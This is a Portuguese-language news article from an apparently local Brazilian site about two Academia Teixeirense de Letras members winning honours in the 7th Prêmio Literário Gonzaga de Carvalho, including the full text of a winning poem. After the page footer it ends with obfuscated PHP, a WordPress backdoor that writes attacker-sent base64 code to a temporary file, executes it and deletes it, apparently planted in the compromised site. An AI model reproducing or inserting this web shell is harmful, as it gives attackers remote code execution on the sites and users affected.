• SEJA BEM-VINDO

Academia Teixeirense de Letras bem representada no 7º Prêmio Literário Gonzaga de Carvalho

Publicado em: 28/08/2022 Atualizado:: agosto 28, 2022

 

A Academia Teixeirense de Letras (ATL) está muito bem representada na 7ª edição do Prêmio Literário Gonzaga de Carvalho, cujo resultado foi divulgado neste final de semana.

 

O certame é organizado pela Academia de Letras de Teófilo Otoni (ALTO), dirigido aos acadêmicos correspondentes brasileiros e estrangeiros e premia textos nas categorias poema, conto e crônica. Em 2022, a ALTO celebra 20 anos de fundação.

 

A ATL teve dois de seus membros premiados no concurso literário. Trata-se de Almir Zarfeg e Carlos Mensitieri, que se destacaram nas categorias crônica/conto e poema/crônica, respectivamente. Eles vão receber troféu, medalhas e diplomas personalizados.

 

Zarfeg recebeu menções honrosas pelo poema “20 anos não são 20 dias” e pela crônica “Quando dezembro chegar…”. Mensitieri obteve a 2ª colocação com a crônica “As promessas de um político na feira livre” e uma menção honrosa pelo conto “Zé Caveirinha e a seca do Mucuri”.

 

 

Acadêmicos Almir Zarfeg e Carlos Mensitieri premiados na 7ª edição do Prêmio Gonzaga de Carvalho

 

Dentre os premiados baianos, aparecem também autores das cidades de Nazaré, Nova Viçosa, Teixeira de Freitas e Salvador.

 

“Estou muito feliz por, já na minha primeira participação, ter dois textos premiados”, afirmou Carlos Mensitieri, que em novembro será empossado presidente da ATL. Na oportunidade, ele vai autografar seu mais novo livro, “Textos cruzados: prosa, poesia & vice-versa”.

 

“Pela terceira vez consecutiva, tenho a honra de ser premiado nesse concurso tão importante para a literatura de Minas e do Brasil. Portanto, meus parabéns para a diretoria acadêmica da ALTO”, comentou Zarfeg, que é presidente de honra da Academia Teixeirense de Letras.

 

A seguir, poema zarfeguiano premiado:

 

……………………………………………………….

 

20 ANOS NÃO SÃO 20 DIAS

 

Reviva as palavras ditas, escritas ou
Simplesmente esquecidas
Saboreie os dias quentes, frios, sábados,
Sundaes, santos e feriados

 

Experimente a feira livre de ocasião:
Varais de cordel, carne de primeira,
Montanha de cereais, farinha do mesmo saco!
Alguns milagres acontecem diante do seu nariz!

 

Vivencie os momentos doces e prosaicos!
Não perca mais tempo! Nem a esperança!

 

Em vez de adiar, prepare-se pro de repente
(hora h)
Mas cuide bem do seu tendão de Aquiles
(dia d)

 

Semeie pássaros pelos ares, ímpares,
Pares, primos, múltiplos de quatro!
Multiplique infinitos – compartilhe imensidão!
Que está esperando? Voe alto, alto, ALTO!

 

Depois volte para casa, pássaro valente, certo
De que o voo estará onde estiver o horizonte!

 


JORNAL INDEPENDENTE


Siga as redes sociais

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}